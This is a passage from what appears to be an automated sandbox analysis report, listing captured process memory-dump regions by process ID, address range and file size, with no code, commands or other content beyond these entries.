                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4356-140-0x0000000004A70000-0x0000000004A71000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4356-168-0x00000000044C0000-0x00000000044C1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4356-176-0x00000000030F0000-0x0000000003682000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      5.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4356-174-0x00000000030F0000-0x0000000003682000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      5.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4356-227-0x00000000030F0000-0x0000000003682000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      5.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4356-228-0x00000000030F0000-0x0000000003682000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      5.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4356-138-0x00000000030F0000-0x0000000003682000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      5.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4356-137-0x00000000030F0000-0x0000000003682000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      5.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4356-170-0x00000000037C0000-0x0000000003900000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      1.2MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4356-135-0x00000000030F0000-0x0000000003682000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      5.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4356-146-0x00000000030F0000-0x0000000003682000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      5.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4356-133-0x00000000030F0000-0x0000000003682000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      5.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4356-166-0x00000000030F0000-0x0000000003682000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      5.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4356-111-0x00000000030F0000-0x0000000003682000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      5.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4356-109-0x00000000030F0000-0x0000000003682000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      5.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4356-108-0x00000000030F0000-0x0000000003682000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      5.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4356-106-0x0000000063280000-0x00000000634BE000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      2.2MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4356-107-0x000000006E600000-0x000000006E69D000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      628KB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4356-104-0x00000000030F0000-0x0000000003682000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      5.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4356-195-0x00000000030F0000-0x0000000003682000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      5.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4356-100-0x0000000000400000-0x0000000000931000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      5.2MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4356-169-0x00000000037C0000-0x0000000003900000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      1.2MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4480-210-0x0000000003330000-0x00000000038C2000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      5.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5048-19-0x00000000073E0000-0x0000000007A5A000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      6.5MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5048-23-0x0000000006F60000-0x0000000006F82000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      136KB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5048-20-0x0000000005FE0000-0x0000000005FFA000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      104KB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5048-2-0x0000000000D50000-0x0000000000D86000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      216KB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5048-3-0x0000000004C40000-0x0000000005268000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      6.2MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5048-18-0x0000000005AF0000-0x0000000005B3C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      304KB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5048-17-0x0000000005AA0000-0x0000000005ABE000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      120KB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5048-22-0x0000000006FC0000-0x0000000007056000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      600KB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5048-4-0x0000000004BF0000-0x0000000004C12000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      136KB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5048-24-0x0000000008010000-0x00000000085B4000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      5.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5048-5-0x0000000005360000-0x00000000053C6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      408KB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5048-6-0x0000000005480000-0x00000000054E6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      408KB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5048-16-0x00000000054F0000-0x0000000005844000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      3.3MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5088-85-0x00000215A1DD0000-0x00000215A2F64000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      17.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5088-98-0x0000021586140000-0x0000021586148000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      32KB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5092-32-0x00000000008A0000-0x0000000000D49000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      4.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5092-47-0x00000000008A0000-0x0000000000D49000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      4.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5612-799-0x000001FA80160000-0x000001FA80168000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      32KB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5652-831-0x00000203316E0000-0x00000203316E8000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      32KB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5844-671-0x00000000003A0000-0x000000000083F000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      4.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5844-663-0x00000000003A0000-0x000000000083F000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      4.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5956-125-0x0000024A682B0000-0x0000024A682B8000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      32KB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/6108-891-0x0000019B48920000-0x0000019B48942000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      136KB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/6784-21056-0x0000000000400000-0x00000000008C2000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      4.8MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/6784-20989-0x0000000000400000-0x00000000008C2000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      4.8MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/8400-21140-0x0000000004FB0000-0x000000000504C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      624KB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/8400-21139-0x0000000000400000-0x0000000000432000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      200KB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/8400-21467-0x0000000005D80000-0x0000000005E12000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      584KB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/14328-20963-0x0000000000DC0000-0x0000000001269000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      4.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/14328-20961-0x0000000000DC0000-0x0000000001269000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                      4.7MB